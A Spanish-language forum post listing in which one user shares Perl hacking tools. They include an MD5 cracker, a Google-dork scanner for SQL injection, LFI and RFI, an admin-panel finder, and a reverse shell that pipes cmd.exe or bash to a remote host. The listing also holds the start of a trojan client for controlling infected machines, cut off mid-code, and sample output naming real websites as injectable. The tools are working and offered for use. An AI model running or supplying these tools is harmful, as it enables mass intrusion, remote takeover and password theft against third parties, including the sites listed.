Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BigBear

Páginas 1 ... 23 24 25 26 27

#481

Perl / [Perl] Search MD5

Julio 03, 2011, 09:50:07 PM

Hola a todos

HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk

Código: perl


#Search MD5 
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

sub oper{ 
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}

MainLoop;

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/searchmd5x/

#482

Perl / [Perl] Search in google for scan SQLI

Julio 03, 2011, 09:49:49 PM

Un simple scanner de SQLI para usar en google

Código: perl


#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#483

Perl / [Perl] Scan Port By Doddy H

Julio 03, 2011, 09:49:34 PM

HOla a todos aca les traigo un simple scanner de puertos
hecho en perl

Código: perl


#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

Ejemplo de uso

Código: php


perl scan.pl localhost

#484

Perl / [Perl] Reverse Shell By Doddy

Julio 03, 2011, 09:49:16 PM

Hola a todos.

Hoy traigo un simple reverse shell en esta version solo pueden conectarse al server que tiene netcat
despues ofrece informacion depende del sistema operativo que tiene el que ejecuto el script.
En la version 0.2 le agregare deteccion de kernel y su posible exploit.

Código: perl


#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("bin/bash");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End

#485

Perl / [Perl] PasteBin Uploader

Julio 03, 2011, 09:49:04 PM

Bueno aca eh terminado un programa que los ayudara a publicar sus programas
en pastebin de una forma rapida y sin ganas xDDD

Entonces , este programa tiene dos opciones :

Publica solo un archivo

Publica todos los archivos en un directorio

Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo

Código: perl


#!usr/bin/perl
#Paste Bin Uploader (C) Doddy Hackman 2011

use LWP::UserAgent;
use HTTP::Request::Common;	

my $nave = LWP::UserAgent->new();
$nave->timeout(10);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

menu();

sub menu {

clean();
header();

print "\n\n[Options]\n\n";
print "[1] : Upload a file\n";
print "[2] : Upload a directory\n";
print "[3] : Exit\n\n";
print "[Option] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[File] : ";
chomp(my $file = <stdin>);

if (-f $file)  {

($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {


$code = openfile($file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}


} else {
print "\n\n[-] Error\n\n";
}
reload();
}

elsif ($op eq 2) {

print "\n\n[Directory] : ";
chomp(my $dir = <stdin>);

if (-d $dir) {

my @files = verdir($dir);

print "\n\n[+] Loading directory\n";

for my $file(@files) {

chomp $file;

my ($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {

my $code = openfile($dir."/".$file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}
}
} else {
print "\n\n[-] Error\n\n";
}

reload();
}

elsif ($op eq 3) {
copyright();
<stdin>;
exit(1);
}

else {
menu();
}
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

sub header {

print q(

 PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP 
 PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
 PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
 PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP 
 PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP   
 PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP   
 PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP   


);

}

sub clean {
system("cls");
}



sub verdir{
my @archivos;
opendir DIR,$_[0];
my @archivos = readdir DIR;
for (@archivos) {
if (-f $_[0]."/".$_) {
push(@files,$_)
}
}
return @files;
}

sub verfile {
if ($_[0]=~/(.*)\.(.*)/ig) {
return ($1,$2);
}
}

sub extensiones {

if ($_[0] =~/py/ig) {
$code  = "python";
}
elsif ($_[0] =~/pl/ig) {
$code = "perl";
}
elsif ($_[0] =~/rb/ig) {
$code = "ruby";
}
elsif ($_[0] =~/php/ig) {
$code = "php";
}
elsif ($_[0] =~/txt/ig) {
$code = "";
}
else {
$code = "Yet";
}
return $code;
}

sub reload {
print "\n\n[?] Enter for continue\n\n";
<stdin>;
menu();
}



sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub openfile {
	
my $r;

open (FILE,$_[0]);
@wor = <FILE>;
close FILE;
for(@wor) {
$r.= $_;
}
return $r;
}

sub lleva {
return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
} 

# ¿ The End ?

#486

Perl / [Perl] Pass Cracker By DOddy H

Julio 03, 2011, 09:48:52 PM

Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5

Código: perl


#!usr/bin/perl
#Pass Cracker 1.0 
#(C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

sub crackit {

print "\n[+] Cracking $_[0]\n\n";

my %hash = (
   
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},   
'http://md5.hashcracking.com/search.php?md5=' =>  { 
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  { 
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  { 
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  { 
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  { 
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n"; 
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

Ejemplo de uso

Código: php


perl crack.pl <hash>

#487

Perl / [Perl] Paranoic Scan By Doddy H

Julio 03, 2011, 09:48:39 PM

Hola.

Hoy traigo un programa que eh estado haciendo porque estaba arto de ir probando cada
web que encontraba en google para saber si tenia la vulnerabilidad que queria
Asi que por eso hice esta tool , con las siguientes opciones

* Permite scaner un archivo con webs
* Permite buscar en google , borrar repes , y luego scanear

Tipos de scan :

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOURE

Ejemplo de uso

Código: perl





@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136

[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
[+] SQLI : http://www.cibercolchon.com/ficha.php?id=
[+] SQLI : http://www.100citiesinitiative.org/ficha.php?ID=
[+] SQLI : http://www.nibbledpencil.com/ficha.php?id=

[Status] : Finish



(C) Doddy Hackman 2010

Codigo

Código: perl


#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
 @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @ 
 @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @ 
 @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @ 
 @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @ 
 @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@ 
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @ 




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
} 
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
} 
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;
	 

sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
} 	
return(repes(@r));
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
} 	
return(@r);
} 

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

#488

Perl / [Perl] Panel Control 0.6

Julio 03, 2011, 09:48:11 PM

La nueva version de esta herramienta para buscar
el panel de administracion

Código: perl


#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#489

Perl / [Perl] Nefaster

Julio 03, 2011, 09:47:59 PM

Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar

Mostrar Informacion
Navegador de archivos
Cambiar directorio de navegacion
Crear archivo
Borrar archivo
Borrar directorio
Reproducir musica o videos poniendo la ruta en la opcion
Parar reproduccion
Abrir lectora de CD
Cerrar lectora de CD
Puertos abiertos
Mensaje
Ejecutar comandos
Esconder barra de tareas
Devolver barra de tareas
Esconder iconos del escritorio
Devolver iconos del escritorio
Administrar procesos con posibilidad de cerrar el que quieran

Reverse Shell si es que quieren ejecutar comandos de forma mas comoda

El codigo del cliente es este

Código: perl


#!usr/bin/perl
#Nefester (Cliente) 0.1 By Doddy H


use IO::Socket;
use Cwd;

&menu;

sub head {

system 'cls';

print q(


            E      F                   TT    E        
NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR 
 NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR 
 NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R 
 NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR  
 NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R  
 NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R 
NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                            SS                 R   R  



);

}

sub menu {

&head;

print "[Target] : ";
chomp(my $ip = <STDIN>);



my $socket = new IO::Socket::INET( 
PeerAddr => $ip,
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

if ($socket) {
$socket->close;
&menuo($ip);
} else {
print "\n\n[-] Target no infectado\n";
<STDIN>;
&menu; 
}

}

sub menuo {

&head;

print "[$_[0]] : Servidor Activado\n\n";
print q(
1 : Informacion
2 : Navegador
3 : Abrir CD
4 : Cerrar CD
5 : Puertos abiertos
6 : Mensaje
7 : CMD
8 : Esconder barra de tareas
9 : Devolver barra de tareas
10 : Esconder iconos
11 : Devolver iconos
12 : Administrar procesos
13 : Reverse Shell
14 : Cambiar IP
15 : Salir


);
print "[Opcion] : ";
chomp(my $opcion = <STDIN>);


if ($opcion eq 1) {
print "\n\n[+] Informacion\n\n";
$re = daryrecibir($_[0],"infor");
if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
print "[Dominio] : $1\n";
print "[Chip] : $2\n";	
print "[Version] : $3\n";	
print "[Nombre] : $4\n";	
print "[OS] : $5\n";
<stdin>;
} 
&menuo($_[0]);
} 
elsif ($opcion eq 2) {

menu1:
